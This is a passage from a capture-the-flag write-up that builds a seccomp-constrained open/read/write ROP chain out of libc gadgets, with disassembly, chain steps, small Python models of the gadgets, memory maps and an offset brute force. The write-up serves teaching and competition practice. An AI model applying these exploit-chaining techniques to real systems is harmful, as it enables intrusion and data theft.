mov rax, 1
mov rdi, 1
mov rsi, {Buffer} To print out flag
mov rdx, value less than 0x1000
syscall = write syscall
**Crash gloriously in victory**
This entire chain is dead if we can't load flag.txt, so this may be one of the most important gadgets. I actually stumbled upon this gadget by accident while I was working on a dead end earlier and had far harder constraints to work with. But behold,
0x7f9cb238a8f0 <hcreate>: endbr64
0x7f9cb238a8f4 <hcreate+4>: lea rsi,[rip+0xfe835] <--writeable address
0x7f9cb238a8fb <hcreate+11>: jmp 0x7f9cb238a900 <hcreate_r>
0x7f9cb238a900 <hcreate_r>: endbr64
0x7f9cb238a904 <hcreate_r+4>: test rsi,rsi
0x7f9cb238a907 <hcreate_r+7>: je 0x7f9cb238a9bb <hcreate_r+187>
0x7f9cb238a90d <hcreate_r+13>: push rbx
0x7f9cb238a90e <hcreate_r+14>: xor eax,eax
0x7f9cb238a910 <hcreate_r+16>: cmp QWORD PTR [rsi],0x0
0x7f9cb238a914 <hcreate_r+20>: mov rbx,rsi
0x7f9cb238a917 <hcreate_r+23>: je 0x7f9cb238a920 <hcreate_r+32>
0x7f9cb238a919 <hcreate_r+25>: pop rbx
0x7f9cb238a91a <hcreate_r+26>: ret
You can look up the function in further detail, but it effectively creates a memory space for a hash table unless it decides a hash table has already been created. The best part is that the address loaded is writeable, so we can put "flag.txt" there before we jump to our chain. You may be thinking that this is somewhat pointless as RSI is not RDI and we still can't open it, but what would be the second most important part of the chain?
Syscall and Friends
You probably think that this is an easy gadget to secure, and boy would you be wrong. Thinking this through, we need an open syscall first, why not just call open, since we should be able to look it up and it should pass as syscalls usually don't cause segfaults but just fail. This is why, here are the only two syscalls in the open function:
...
0x7f9cb237f664 <open64+84>: mov eax,0x101
0x7f9cb237f669 <open64+89>: syscall
...
0x7f9cb237f6dd <open64+205>: mov eax,0x101
0x7f9cb237f6e2 <open64+210>: syscall
...
Now who in their right mind thought that the open function should use the openat syscall instead? Not only is this function dead, but there are no instances of mov r/eax, 0; syscall or something similar that is usable anywhere in libc. Normally this wouldn't be a problem, but the seccomp limits us and any other syscall that runs will kill execution. This is also the reason we can't just jump right before a syscall, such as open64+89, as RAX is clobbered during _dl_fixup, which stops us from just saving a raw syscall. So we need a way around this. What about the syscall function:
0x00007f9cb2389930 <+0>: endbr64
0x00007f9cb2389934 <+4>: mov rax,rdi
0x00007f9cb2389937 <+7>: mov rdi,rsi
0x00007f9cb238993a <+10>: mov rsi,rdx
0x00007f9cb238993d <+13>: mov rdx,rcx
0x00007f9cb2389940 <+16>: mov r10,r8
0x00007f9cb2389943 <+19>: mov r8,r9
0x00007f9cb2389946 <+22>: mov r9,QWORD PTR [rsp+0x8]
0x00007f9cb238994b <+27>: syscall
0x00007f9cb238994d <+29>: cmp rax,0xfffffffffffff001
0x00007f9cb2389953 <+35>: jae 0x7f9cb2389956 <syscall+38>
0x00007f9cb2389955 <+37>: ret
0x00007f9cb2389956 <+38>: mov rcx,QWORD PTR [rip+0xf64b3] # 0x7f9cb247fe10
0x00007f9cb238995d <+45>: neg eax
0x00007f9cb238995f <+47>: mov DWORD PTR fs:[rcx],eax
0x00007f9cb2389962 <+50>: or rax,0xffffffffffffffff
0x00007f9cb2389966 <+54>: ret
This bundles a syscall into argument style, so not only could we set RDI to 2 then call this, this will also move our flag into RDI to complete the write, and we can call this from our lookup as RDI will be 1 for the write call, turning this into a write call that ultimately fails in the original lookup. This would be perfect except for 1 issue... mov rsi,rdx. We have no control of RDX, except that we can guarantee it will point to the last gadget called in our fini_array. So the only way I could think of to do this is to use the beauty of syscalls, sub rcx, rax, and a push rcx; ret.
If you are not aware, syscalls take their arguments in the registers rdi, rsi, rdx, r10, r8, r9, in that order. Why no RCX? In fact, RCX is set to the address of the next instruction after a syscall, so whether the syscall succeeds or not, the return (not sure what else to call it) address is stored in RCX. Then we just subtract 2 bytes and find a way to jump to RCX. There were jump RCX gadgets, but for some reason I decided on the push rcx; ret; I can't remember if I just couldn't find a working jmp or not. You may be thinking that this shouldn't pass the lookup function, but it does, barely. Using the ability above, after a syscall RCX is set, which means that RCX points to the address right after the syscall in read, so we push that address and then return safely back to nightmare.
So here are the two gadgets:
0x7f9cb22cc3fa <printf_size_info+26>: mov eax,0x1
0x7f9cb22cc3ff <printf_size_info+31>: ret
0x7f9cb22fa888 <_IO_adjust_column+40>: sub rcx,rax
0x7f9cb22fa88b <_IO_adjust_column+43>: lea eax,[rcx-0x1]
0x7f9cb22fa88e <_IO_adjust_column+46>: ret
Given the gadget for sub rcx, rax, I either needed to do it twice, as rax will get clobbered, or find an add rax, 1:
0x7f9cb2317250 <envz_get+32>: add rax,0x1
0x7f9cb2317254 <envz_get+36>: test dl,dl
0x7f9cb2317256 <envz_get+38>: mov edx,0x0
0x7f9cb231725b <envz_get+43>: cmove rax,rdx
0x7f9cb231725f <envz_get+47>: ret
Luckily RDX is never zero, so the DL check can be avoided. But since we changed the method of calling syscall, RSI still points to the flag now. So we need to call syscall once and have it fail, which allows us to move RSI into RDI. Normally this would also set RCX, but on its error path the syscall function, for some reason, overwrites RCX first (the mov rcx at +38 above), so for this I called write instead, setting RCX from that syscall instead.
RSI = Zero, RDI, and Full OPEN
Now we still need to get RSI to zero, as we want to open the flag read-only (O_RDONLY is 0); finding a gadget for this was a bit tough. By utilizing the hcreate function above to set RSI to the flag, we can then and esi, 0x200 to get the zero we desire.
0x7f9cb239eee0 <__memcpy_chk+64>: and esi,0x200
0x7f9cb239eee6 <__memcpy_chk+70>: lea rdx,[rip+0x74353] # 0x7f9cb2413240
0x7f9cb239eeed <__memcpy_chk+77>: lea rax,[rip+0x743bc] # 0x7f9cb24132b0
0x7f9cb239eef4 <__memcpy_chk+84>: cmove rax,rdx
0x7f9cb239eef8 <__memcpy_chk+88>: ret
This one was close, as __memcpy_chk doesn't actually resolve, but luckily the function right before it does: good ol' __cyg_profile_func_exit. Also luckily, based on the address I was using for the flag file name, ANDing with 0x200 resulted in 0.
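Whether this gadget zeroes RSI depends only on bit 9 of the address, since and esi, 0x200 is a 32-bit operation that also clears the upper half of RSI. A small sketch of that check follows; both addresses are hypothetical and only chosen to show the two outcomes.

```python
MASK32 = (1 << 32) - 1


def and_esi_0x200(rsi):
    """Model `and esi, 0x200`: 32-bit op, so the upper 32 bits of RSI become 0."""
    return (rsi & MASK32) & 0x200


def zeroes_rsi(flag_addr):
    """True if the gadget leaves RSI == 0 for this flag-name address."""
    return and_esi_0x200(flag_addr) == 0


# Hypothetical flag-name addresses (not the ones used in the exploit).
print(zeroes_rsi(0x7F9CB2480100))  # True: bit 9 is clear
print(zeroes_rsi(0x7F9CB2480200))  # False: bit 9 is set
```

If the address had bit 9 set, RSI would end up as 0x200 and a different storage location for the file name would be needed.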
With this out of the way we can now set RDI. This is only important for the first syscall we need to make, as it still needs to be a valid syscall number to move to RAX.
So here is that gadget:
0x7f9cb22c60d3: mov edi,eax
0x7f9cb22c60d5: cmp rdx,rcx
0x7f9cb22c60d8: jae 0x7f9cb22c60bc
0x7f9cb22c60da: mov rax,r8
0x7f9cb22c60dd: ret
This is at cuserid+243. The one catch is that RCX needs to be greater than RDX or this won't work, as it jumps away, does some garbage, then crashes. Since RDX is near our chain, the only way I could figure out to set RCX higher was another syscall.
So the full chain for open becomes:
set rsi to flag mem
write function , sets rcx higher than rdx
mov rax, 1
mov rdi, rax
syscall func, mov rdi, rsi
set rsi to flag
and esi, 0x200, zero rsi
mov rax, 1
add rax, 1
sub rcx, rax; resets rax
mov rax, 1
add rax, 1, set rax to open
push rcx; ret
Not too shabby!
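The tail of that chain repeats mov rax, 1 / add rax, 1 because the sub rcx, rax gadget clobbers RAX on its way out. Below is a rough register-level model of just those last steps, written from the gadget listings above. It is a sketch, not the exploit: the RCX input is a placeholder, and the DL value is passed in as a parameter on the assumption that it is non-zero when the gadget runs.

```python
MASK64 = (1 << 64) - 1
MASK32 = (1 << 32) - 1
SYS_OPEN = 2  # x86-64 Linux syscall number for open


def add_rax_1(rax, dl):
    """envz_get+32: add rax,1 ; test dl,dl ; mov edx,0 ; cmove rax,rdx.

    If DL was zero, the cmove copies the freshly zeroed RDX into RAX.
    """
    rax = (rax + 1) & MASK64
    return 0 if dl == 0 else rax


def sub_rcx_rax(rcx, rax):
    """_IO_adjust_column+40: sub rcx,rax ; lea eax,[rcx-0x1]. Returns (rcx, rax)."""
    rcx = (rcx - rax) & MASK64
    return rcx, (rcx - 1) & MASK32


def open_chain_tail(rcx_after_syscall, dl=0x08):
    """Model the last six steps of the open chain; dl is an assumed non-zero byte."""
    rax = 1                                         # mov rax, 1
    rax = add_rax_1(rax, dl)                        # add rax, 1 -> 2
    rcx, rax = sub_rcx_rax(rcx_after_syscall, rax)  # rcx -= 2, rax clobbered
    rax = 1                                         # mov rax, 1
    rax = add_rax_1(rax, dl)                        # add rax, 1 -> 2 (open)
    return rax, rcx                                 # push rcx; ret jumps to rcx


# Hypothetical RCX left over from the earlier write syscall.
rax, rcx = open_chain_tail(0x7F0000001236)
print(rax == SYS_OPEN, hex(rcx))
```

The model also shows why the DL condition matters: with dl == 0 the add gadget would hand back RAX = 0 instead of 2.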
Read problems
For the read syscall, we can't just call the read function, as RDX will be a large value and, you wouldn't guess it, read needs the third argument to be around 0x1000 at most. So we need a way to set RDX and call syscall. This turned into a huge headache, but eventually I was able to think of a solution.
If we utilize the syscall function we can move a value from RCX into RDX, allowing us to get a smaller value in there if we can control RCX. We have a rough estimate of what RCX equals, as we just used a syscall. So I found this gadget to make RCX usable:
0x7f9cb22b27c6 <rand_r+70>: and ecx,0x3ff
0x7f9cb22b27cc <rand_r+76>: xor eax,ecx
0x7f9cb22b27ce <rand_r+78>: ret
Next we need to set RSI to our file descriptor. I could have just assumed 3 and worked with it, but the gadgets I found let me move the value from RAX just as easily, by utilizing the zeroing out of RSI from earlier, a move from RAX to RDI, and finally the gadget below.
0x7f9cb22ad924: or esi,edi
0x7f9cb22ad926: movd xmm0,esi
0x7f9cb22ad92a: ret
This was found at modff+0xe4
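As a quick illustration of what these two gadgets buy us, the sketch below models and ecx, 0x3ff (which caps the future count at 0x3ff) and or esi, edi (which copies the file descriptor into an already zeroed RSI). The RCX value and the descriptor 3 are placeholders for illustration; the rand_r gadget also xors EAX with ECX, which is not modelled here.

```python
MASK32 = (1 << 32) - 1


def and_ecx_0x3ff(rcx):
    """rand_r+70: and ecx,0x3ff (32-bit op, upper half of RCX is cleared)."""
    return (rcx & MASK32) & 0x3FF


def or_esi_edi(rsi, rdi):
    """modff+0xe4: or esi,edi (32-bit op on the low halves)."""
    return ((rsi & MASK32) | (rdi & MASK32)) & MASK32


# Hypothetical RCX left over from a previous syscall inside libc.
rcx = 0x7F9CB2389950
count = and_ecx_0x3ff(rcx)

# RSI was zeroed earlier, RDI holds the fd returned by open (3 is an assumption).
fd_in_rsi = or_esi_edi(0, 3)

print(hex(count), fd_in_rsi)
```

Whatever RCX held before, the masked value can never exceed 0x3ff, which keeps the eventual read length small enough.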
RDI/RAX and Read Chain
We also need RDI to be 0. There are several ways this could be done; the method I took was to make RAX become -1 and then use the add 1 gadget from earlier. This can easily be done with just a call to write that will fail, thereby returning -1 as an error.
We should be able to create a chain building off the previous open to read from the flag, but wait, what about RSI during the actual syscall function? Since RSI is set to the value in RDX this works alright. It isn't perfect, as we don't have full control of the location, but we do know that it is writable memory and that is all that really matters for now.
mov rdi, rax
set rsi, to flag , also zeros out rax
and esi, 0x200
or esi, edi
write call, rax = -1
add rax, 1
mov rdi, rax
and rcx, 0x3ff
syscall func
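To see why this register setup ends up as a read, here is a sketch of the shuffle that glibc's x86-64 syscall() wrapper performs before executing the syscall instruction, as I understand it (the seventh argument comes from the stack and is left out). The buffer address and the concrete register values are hypothetical stand-ins for the state the chain above builds.

```python
SYS_READ = 0  # x86-64 Linux syscall number for read


def syscall_wrapper(regs):
    """Model the register moves in glibc's syscall(): every argument shifts down one slot."""
    return {
        "rax": regs["rdi"],  # syscall number
        "rdi": regs["rsi"],  # arg 1
        "rsi": regs["rdx"],  # arg 2
        "rdx": regs["rcx"],  # arg 3
        "r10": regs["r8"],   # arg 4
        "r8": regs["r9"],    # arg 5
    }


# Hypothetical state right before the final "syscall func" step of the read chain.
before = {
    "rdi": SYS_READ,         # -1 from the failed write, plus 1
    "rsi": 3,                # fd moved in via or esi, edi (3 is an assumption)
    "rdx": 0x7F0000002000,   # points into the fake fini_array (placeholder)
    "rcx": 0x150,            # masked by and ecx, 0x3ff
    "r8": 0,
    "r9": 0,
}

after = syscall_wrapper(before)
print("read(fd=%d, buf=%#x, count=%#x)" % (after["rdi"], after["rsi"], after["rdx"]))
```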
Write chain
Now we have most of the gadgets we need for a write call as well. Write follows the same guidelines as read, so we need to make RDX smaller again through RCX. Our same gadgets should still work: RSI won't point to the exact address where we stored the flag, but it will still point to the fake fini_array, and we can print the data before and after it.
set rsi, to flag
mov rax, 1
mov rdi, rax
and esi, 0x200
or esi, edi
and rcx, 0x3ff
syscall function
Lastly, to get this to run, all you need to do is call exit so _dl_fini can be called and voilà, a flag... on local at least.
All the garbage will print out with it, as this is from our rop chain.
Remote
I'm going to ignore the fact that my rop chain wasn't working at one point when I first started trying to hit remote and talk about some of the real issues at hand. Here are two memory maps: the first is from my docker environment using the correct hash, and the second is from the author, taken on the remote system.
0x00007eff8f7fa000 0x00007eff8f83d000 0x0000000000000000 rw- <-- mmapped region
0x00007eff8f83d000 0x00007eff8f869000 0x0000000000000000 r-- libc.so.6 <-- 0x43000 offset to mmapped region
0x00007eff8f869000 0x00007eff8f9fd000 0x000000000002c000 r-x libc.so.6
0x00007eff8f9fd000 0x00007eff8fa51000 0x00000000001c0000 r-- libc.so.6
0x00007eff8fa51000 0x00007eff8fa52000 0x0000000000214000 --- libc.so.6
0x00007eff8fa52000 0x00007eff8fa55000 0x0000000000214000 r-- libc.so.6
0x00007eff8fa55000 0x00007eff8fa58000 0x0000000000217000 rw- libc.so.6
0x00007eff8fa58000 0x00007eff8fa67000 0x0000000000000000 rw-
0x00007eff8fa69000 0x00007eff8fa6a000 0x0000000000000000 r-- ld-linux-x86-64.so.2 <-- 0x22c000 offset to LIBC
0x00007eff8fa6a000 0x00007eff8fa92000 0x0000000000001000 r-x ld-linux-x86-64.so.2
0x00007eff8fa92000 0x00007eff8fa9c000 0x0000000000029000 r-- ld-linux-x86-64.so.2
0x00007eff8fa9c000 0x00007eff8fa9e000 0x0000000000032000 r-- ld-linux-x86-64.so.2
0x00007eff8fa9e000 0x00007eff8faa0000 0x0000000000034000 rw- ld-linux-x86-64.so.2
7f54d09a4000-7f54d09e8000 rw-p 00000000 00:00 0 <-- mmapped region
7f54d09e8000-7f54d0a14000 r--p 00000000 00:2a7 9044063 libc.so.6 <-- 0x44000 offset to the heap
7f54d0a14000-7f54d0ba8000 r-xp 0002c000 00:2a7 9044063 libc.so.6
7f54d0ba8000-7f54d0bfc000 r--p 001c0000 00:2a7 9044063 libc.so.6
7f54d0bfc000-7f54d0bfd000 ---p 00214000 00:2a7 9044063 libc.so.6
7f54d0bfd000-7f54d0c00000 r--p 00214000 00:2a7 9044063 libc.so.6
7f54d0c00000-7f54d0c03000 rw-p 00217000 00:2a7 9044063 libc.so.6
7f54d0c03000-7f54d0c10000 rw-p 00000000 00:00 0
7f54d0c12000-7f54d0c14000 rw-p 00000000 00:00 0
7f54d0c14000-7f54d0c15000 r--p 00000000 00:2a7 9044044 ld-linux-x86-64.so.2 <-- 0x22c000 offset to LIBC
7f54d0c15000-7f54d0c3d000 r-xp 00001000 00:2a7 9044044 ld-linux-x86-64.so.2
7f54d0c3d000-7f54d0c47000 r--p 00029000 00:2a7 9044044 ld-linux-x86-64.so.2
7f54d0c47000-7f54d0c49000 r--p 00032000 00:2a7 9044044 ld-linux-x86-64.so.2
7f54d0c49000-7f54d0c4b000 rw-p 00034000 00:2a7 9044044 ld-linux-x86-64.so.2
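The annotated offsets can be recomputed directly from the base addresses in the two listings. This is only arithmetic on the addresses shown above; the dictionary keys are names picked for this sketch.

```python
# Base addresses copied from the two memory maps above.
local = {"mmap": 0x00007EFF8F7FA000, "libc": 0x00007EFF8F83D000, "ld": 0x00007EFF8FA69000}
remote = {"mmap": 0x7F54D09A4000, "libc": 0x7F54D09E8000, "ld": 0x7F54D0C14000}


def deltas(maps):
    """Distances between the mmapped region, libc, and ld for one process."""
    return {
        "libc - mmap": maps["libc"] - maps["mmap"],
        "ld - libc": maps["ld"] - maps["libc"],
    }


for name, maps in (("local", local), ("remote", remote)):
    print(name, {k: hex(v) for k, v in deltas(maps).items()})

# Difference in the mmap-to-libc distance between the two systems.
print(hex(deltas(remote)["libc - mmap"] - deltas(local)["libc - mmap"]))  # 0x1000
```

The ld-to-libc distance is the same on both systems (0x22c000); only the mmapped region sits 0x1000 further from libc on the remote.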
After looking at this you would have the same assumption as me and everyone else that looked at it, all you need to do is add 0x1000 to all the offsets, let's see if that works.
run 0: started
run 0: flag not found
Well that is not reassuring. Maybe I mistyped something, so I checked, then double checked, then triple checked. Then I asked someone else for confirmation on their system, and their offsets were even more different. This is also where I learned about the puts error that I ran into; thanks ath0 for this. So maybe a different gadget was running into the same issue of loading a different function because of CPU capabilities, but after looking through them, none of the gadgets should run into this. So I came to the assumption that one of my offsets still had to be different compared to my system, and there is one offset that stands apart from everything else.
That would be the libc link map. Looking back, our link map is at libc+0x228000. Now this offset is a bit strange, as it is almost at ld and at the far edge of libc. It didn't truly occur to me that this is probably a loaded sub value, as the remote system has two different mmapped chunks after libc and mine only has 1. To find the correct offset, you guessed it, we brute force: I set up a quick brute to step every 8 bytes starting at 0x22a000 from libc, and got a hit at 0x200. Now giving me the flag!!!
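The brute force itself is simple enough to sketch. The version below assumes a hypothetical try_offset callback that runs the whole exploit against the remote with a given link map offset and reports whether the flag came back; the 0x1000 search span is also an assumption, and the fake callback at the bottom only exists so the sketch runs on its own.

```python
def candidate_offsets(start=0x22A000, span=0x1000, step=8):
    """Libc-relative link map offsets to try, one pointer-sized step at a time."""
    return range(start, start + span, step)


def brute(try_offset, candidates):
    """Return the first offset for which try_offset() reports success, else None."""
    for off in candidates:
        if try_offset(off):
            return off
    return None


# Stand-in for a real exploit run: pretends one arbitrary offset works.
def fake_try_offset(off):
    return off == 0x22A010


hit = brute(fake_try_offset, candidate_offsets())
print(hex(hit) if hit is not None else "flag not found")
```

In practice each attempt is a full run of the exploit, so keeping the step at pointer size and the span small matters for how long the brute takes.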
Takeaway
This challenge took more of my time than any CTF challenge in a long while. I'm happy that I was able to successfully complete it, but a bit disappointed that I wasn't able to claim the blood because of different system offsets, not even libc/ld. Before you think, "why not just check their system and try it"... I did. I ran my exploit for their other challenge, interview, and checked the kernel version thinking this would work. Found the rare instance, then tried it on 3 different ubuntu versions; all had different offsets than the remote. So I reached out to the infra man, and was informed that:
theyre running the ubuntu-gke-2004-1-21-v20211104 gcp image
kernel is 5.4.0-1054-gke
At this point I thought I had spent enough time trying to get this working and pretty much threw in the towel, as it was already past the deadline. So it was a great surprise when my last gamble actually paid off while I was writing this writeup.
Anyways, thanks for reading and thanks to pepsipu for the challenge, ath0 for the sanity check and help, and sour for sitting in discord and watching me fail for hours when you didn't fully understand what was going on!